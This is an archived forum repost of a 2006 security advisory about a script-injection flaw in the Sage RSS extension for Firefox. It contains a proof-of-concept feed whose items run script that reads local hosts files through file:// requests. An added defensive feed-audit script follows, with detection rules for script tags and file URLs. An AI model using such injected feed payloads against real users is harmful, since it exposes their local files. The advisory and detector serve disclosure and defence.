EvilOctal Security Team Technical Discussion Group's Archiver

knight 2006-9-13 07:24

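[Repost] Firefox Sage Extension RSS Feed Script Injection Vulnerability

Source: NSFOCUS

Firefox Sage Extension RSS Feed Script Injection Vulnerability

Published: 2006-09-08
Updated: 2006-09-12

Affected systems:
Mozine Sage 1.3.6
Description: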
--------------------------------------------------------------------------------
BUGTRAQ  ID: 19928

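Sage is a lightweight RSS and Atom feed aggregator extension for Firefox.

Sage has an input validation error when processing content tags in RSS feeds. A remote attacker could exploit this vulnerability to execute malicious code on the user's machine.

If a user is tricked into adding a malicious RSS feed and views its content, arbitrary HTML and script code is injected and executed in the local context.

<*Source: pdp (pdp.gnucitizen@googlemail.com)
  
  Links: http://secunia.com/advisories/21839/
         http://www.gnucitizen.org/blog/cross-context-scripting-with-sage/
*>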

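Test method:
--------------------------------------------------------------------------------

WARNING

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!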

<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/">
  <channel>
    <title>Cross Context Scripting with Sage</title>
    <item>
      <title>WINDOWS: works with "Allow HTML Tags" off</title>
      <content:encoded>
        <![CDATA[ <script>try { request = new XMLHttpRequest(); request.open("GET", "file:///C:/WINDOWS/system32/drivers/etc/hosts"); request.send(null); alert(request.responseText); } catch(e) {}</script>
        ]]>
      </content:encoded>
    </item>
    <item>
      <title>WINDOWS: works with "Allow HTML Tags" on</title>
      <content:encoded>
        <![CDATA[ <script>try { request = new XMLHttpRequest(); request.open("GET", "file:///C:/WINDOWS/system32/drivers/etc/hosts"); request.send(null); alert(request.responseText); } catch(e) {}</script>
        ]]>
      </content:encoded>
    </item>
    <item>
      <title>WINNT: works with "Allow HTML Tags" off</title>
      <content:encoded>
        <![CDATA[ <script>try { request = new XMLHttpRequest(); request.open("GET", "file:///C:/WINNT/system32/drivers/etc/hosts"); request.send(null); alert(request.responseText); } catch(e) {}</script>
        ]]>
      </content:encoded>
    </item>
    <item>
      <title>WINNT: works with "Allow HTML Tags" on</title>
      <content:encoded>
        <![CDATA[ <script>try { request = new XMLHttpRequest(); request.open("GET", "file:///C:/WINNT/system32/drivers/etc/hosts"); request.send(null); alert(request.responseText); } catch(e) {}</script>
        ]]>
      </content:encoded>
    </item>
    <item>
      <title>UNIX: works with "Allow HTML Tags" off</title>
      <content:encoded>
        <![CDATA[ <script>try { request = new XMLHttpRequest(); request.open("GET", "file:///etc/hosts"); request.send(null); alert(request.responseText); } catch(e) {}</script>
        ]]>
      </content:encoded>
    </item>
    <item>
      <title>UNIX: works with "Allow HTML Tags" on</title>
      <content:encoded>
        <![CDATA[ <script>try { request = new XMLHttpRequest(); request.open("GET", "file:///etc/hosts"); request.send(null); alert(request.responseText); } catch(e) {}</script>
        ]]>
      </content:encoded>
    </item>
  </channel>
</rss>

Recommendation:
--------------------------------------------------------------------------------
Vendor patch:

Mozine
------
The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's homepage for the latest version:

http://addons.mozine.org/extensions/moreinfo.php?id=12%22
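
Added example, not part of the original post or of Sage's own code: a sketch of the input validation the advisory says is missing, written as an audit a reader can run over a feed before subscribing. All function and rule names are hypothetical, the sample feed is constructed, and the regex rules are a triage aid rather than a full HTML sanitizer.

```javascript
// Hypothetical helpers (assumed names, not Sage's API).
const ESC = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
// "Allow HTML Tags" off: item content is text, so every metacharacter is escaped.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (c) => ESC[c]);
}

// Undo one level of entity encoding so markup sent as &lt;script&gt; is still seen.
const cp = (n) => (n <= 0x10ffff ? String.fromCodePoint(n) : "");
function decodeEntities(text) {
  return text
    .replace(/&#x([0-9a-f]+);/gi, (_, h) => cp(parseInt(h, 16)))
    .replace(/&#(\d+);/g, (_, d) => cp(parseInt(d, 10)))
    .replace(/&(lt|gt|quot|apos|amp);/g, (_, n) =>
      ({ lt: "<", gt: ">", quot: '"', apos: "'", amp: "&" })[n]);
}

// Markup that must never reach a page rendered from a local (privileged) context.
const RULES = [
  ["script-element", /<\s*script\b/i],
  ["embedded-document", /<\s*(?:iframe|frame|object|embed)\b/i],
  ["event-handler", /<[^>]*\son[a-z]+\s*=/i],
  ["script-url", /(?:href|src)\s*=\s*["']?\s*(?:javascript|vbscript|data):/i],
  ["local-file-url", /file:\/\//i],
];

// Check the content as delivered and after entity decoding.
function findActiveContent(content) {
  const views = [content, decodeEntities(content)];
  return RULES.filter(([, re]) => views.some((v) => re.test(v))).map(([name]) => name);
}

// Audit each <item>'s <content:encoded> body, with or without a CDATA wrapper.
function auditFeed(feedXml) {
  const report = [];
  for (const [, item] of feedXml.matchAll(/<item>([\s\S]*?)<\/item>/g)) {
    const title = (item.match(/<title>([\s\S]*?)<\/title>/) || [, ""])[1];
    const body = (item.match(/<content:encoded>([\s\S]*?)<\/content:encoded>/) || [, ""])[1]
      .replace(/^\s*<!\[CDATA\[|\]\]>\s*$/g, "");
    report.push({ title, findings: findActiveContent(body) });
  }
  return report;
}

// Constructed sample feed: one plain item, one with inert, entity-hidden markers.
const SAMPLE_FEED = `<rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel>
<item><title>plain</title><content:encoded><![CDATA[<p>Release notes &amp; fixes</p>]]></content:encoded></item>
<item><title>entity-hidden</title><content:encoded>&lt;script&gt;/* marker */&lt;/script&gt; file:///etc/hosts</content:encoded></item>
</channel></rss>`;
```

Calling auditFeed(SAMPLE_FEED) returns one record per item. An item with any finding should be shown only through escapeHtml, whatever the "Allow HTML Tags" setting.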

© 1999-2008 EvilOctal Security Team